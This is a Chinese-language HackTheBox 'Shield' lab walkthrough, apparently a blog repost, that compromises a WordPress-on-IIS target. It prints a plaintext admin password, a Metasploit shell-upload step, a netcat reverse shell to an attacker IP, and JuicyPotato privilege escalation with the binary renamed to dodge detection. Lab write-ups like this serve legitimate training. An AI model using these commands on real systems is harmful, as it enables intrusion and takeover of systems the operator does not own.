HackTheBox-Shield
實驗環境
資訊收集
埠掃描:
namp -A -T4 10.10.10.29
發現80、3306兩個埠,IIS 10.0和MySQL,服務器作業系統為Windows
--script vuln引數掃描常見漏洞 ,發現wordpress目錄,已經掃到了登錄地址
目錄掃描,也發現wordpress目錄
Wpscan分析,可以看到wordpress的版本
wpscan --url http://10.10.10.29/wordpress
實驗程序
用上一臺靶機的賬號密碼可以登錄后臺admin:P@s5w0rd!
知道wordpress admin用戶密碼的情況下,可以使用msf的wp_admin_shell_upload模塊來攻擊,使用模塊
設定引數
執行exploit命令后,獲得shell
在shell中執行命令
查看wp-config.php,發現敏感資訊
反彈shell:
在kali終端輸入nc -nlvp 1234,用來在本機啟動一個監聽埠
在meterpreter中執行nc命令來連接本機監聽埠,使用netcat獲得windows shell
查看當前用戶
提權:(參考:Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM)
使用juicy-potato提權,將JuicyPotato.exe重命成js.exe,防止被對方檢測到
將js.exe上傳到對方機器
在windows shell中生成一個bat腳本:
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.107 1111 > shell.bat
在本機使用nc創建一個監聽埠,用來接收提權后的windows shell
運行juicy-potato提權:
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
獲得system權限的windows shell
在管理員賬戶的桌面目錄下找到flag
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/294863.html
標籤:其他
上一篇:密碼學基本概念與古典密碼